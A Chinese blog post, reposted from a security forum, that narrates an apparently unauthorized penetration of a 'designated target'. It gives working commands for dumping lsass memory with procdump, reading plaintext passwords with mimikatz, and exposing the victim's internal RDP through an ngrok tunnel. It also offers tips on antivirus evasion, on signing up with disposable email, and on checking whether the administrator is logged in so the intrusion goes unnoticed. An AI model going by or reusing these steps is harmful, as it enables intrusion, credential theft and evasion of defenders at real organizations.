1. Ma4ter Blog首页
  2. 实战教程

一次实战渗透过程中的知识点总结

前言

最近闲的时候在搞指定目标“测试”,在拿到目标后,经过广泛的信息收集,找到一个脆弱站点,拿下目标边界一台服务器(文件上传)。虽然直接是system权限,但是想连入目标远程桌面进行更深层次的信息收集,然而却遇到各种问题,做个笔记记录下。

作者:ll天亮了
来源:i春秋论坛

0x01 知识点一

拿下目标shell后发现直接是system权限。

一次实战渗透过程中的知识点总结

system权限虽然说可以干各种各样的事,但是个人一般不会随随便便去新建账户或者改密码,这样很容易被管理员发现。这里我选择的是传一个msf码子弹个meterpreter sessions回来。然而码子一传上去就被杀了,tasklist /svc发现可疑进程查询后得知是一款趋势科技的杀软。kill pid结束不掉,怎么办?免杀呗。经过免杀处理后能成功上传,正向反向都试了一遍,但是session还是始终弹不回来。大概就是下面这个样子,始终到不了ESTABLISHED状态。由于之前没保存图,又懒得再去搞一遍就这么描述一下吧。

一次实战渗透过程中的知识点总结

这里我讲一下为什么我想弹meterpreter回来。主要是为了方便打内网和读密码。既然msf行不通那就只能变换思路。怎么办呢?无奈,只好去新建一个隐藏账户了,然而问题又来了,虽然执行命令没回显基本上是成功了,但是最后去连3389显示用户不存在。

一次实战渗透过程中的知识点总结

<是什么原因导致这种情况,我们把原因归结到杀软上,以为可能是杀软限制了执行与用户相关操作的命令,实际原因等我们最后登录上3389后发现并不是,这里是一个坑,还有怎么登上3389的文章最后再提。咋办?传mimikatz?失败,传不上。然后队友想到了一个好办法,mimikatz是从内存中读密码的。那么我们能不能把它的内存给导出来?最后找到一款绝对免杀的工具软官方工具)prodump,上传prodump.exe执行命令prodump.exe -accepteula -ma lsass.exe lsass.dmp成功导出内存。

一次实战渗透过程中的知识点总结
一次实战渗透过程中的知识点总结

<br>下载到本地用mimikatz读取。把lsass.dmp放到mimikatz目录下,执行命令sekurlsa::minidmp lsass.dmpsekurlsa::logonPasswords full即可读出密码。直接读出了明文密码。

一次实战渗透过程中的知识点总结

0X02 知识点二

密码拿到了,连接3389试一下。然而,他只允许内网连接,尝试了用正向代理的方式,没成功,最后用了一款反向代理工具ngrok直接把它3389映射了出来。

一次实战渗透过程中的知识点总结

ngrok需要到它的官网用邮箱注册,因为他实际上并不会验证,推荐使用临时邮箱。将ngrok上传到目标主机上。首先到ngrok官网上找到你的token。

一次实战渗透过程中的知识点总结

然后在目标主机上执行命令ngrok.exe authtoken your token

一次实战渗透过程中的知识点总结

<br>
然后在执行ngrok.exe tcp 3389即可,现在它的3389已经映射出来了。可以直接连接了,在连接之前要先查询下管理员是否在线使用命令quser即可。

一次实战渗透过程中的知识点总结

如果在线的话,贸然登录会把管理员给挤下去很容易被发现。这里我就贴一张之前登录成功的图吧。

一次实战渗透过程中的知识点总结

连接3389的方式,进入你的ngrok找到status复制里面的URL即可。

一次实战渗透过程中的知识点总结

0x03 写在后面的话

最后登录进去是个什么情况了,发现他有密码复杂度和长度要求。所以我们之前添加用户没有成功并不是因为杀软的阻拦,以后添加用户密码一定得设置的复杂点。另外这个内网很大。

帖子源地址:https://zhuanlan.zhihu.com/p/47189056?edition=yidianzixun&utm_source=yidianzixun&yidian_docid=0KItvmHH

原创文章,作者:Ma4ter,如若转载,请注明出处:https://ma4ter.cn/33.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注